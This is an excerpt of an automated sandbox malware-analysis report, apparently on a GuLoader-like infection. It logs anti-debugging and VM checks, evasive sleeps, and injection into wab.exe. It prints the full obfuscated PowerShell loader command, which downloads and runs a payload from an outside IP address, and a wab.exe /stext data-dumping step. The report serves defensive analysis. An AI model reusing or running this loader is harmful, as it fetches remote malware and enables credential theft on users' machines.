Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 44B833B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5428 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4455 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7181 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2598 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 9344 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1770 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7776 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132 Thread sleep count: 7181 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132 Thread sleep count: 2598 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7852 Thread sleep count: 242 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7852 Thread sleep time: -121000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856 Thread sleep count: 147 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856 Thread sleep time: -441000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856 Thread sleep count: 9344 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856 Thread sleep time: -28032000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_20DE10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE6580 FindFirstFileExA, 10_2_20DE6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW, 11_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00418981 memset,GetSystemInfo, 11_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWdb%SystemRoot%\system32\mswsock.dllxplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfog
Source: wscript.exe, 00000000.00000002.1375235909.00000291C403F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1373894931.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\?w0
Source: wscript.exe, 00000000.00000003.1374264146.00000291C2180000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.1374942655.00000291C2232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367188832.00000291C21E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367319051.00000291C2211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373522658.00000291C2232000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: wscript.exe, 00000000.00000003.1367143521.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1366624974.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1374096917.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375072290.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373894931.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2645737177.0000000000888000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhvB28E.tmp.11.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_20DE60E2
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 11_2_004044A4
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE4AB4 mov eax, dword ptr fs:[00000030h] 10_2_20DE4AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE724E GetProcessHeap, 10_2_20DE724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_20DE60E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_20DE2639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_20DE2B1C

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7836.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3F20000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3BFF08 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum" Jump to behavior
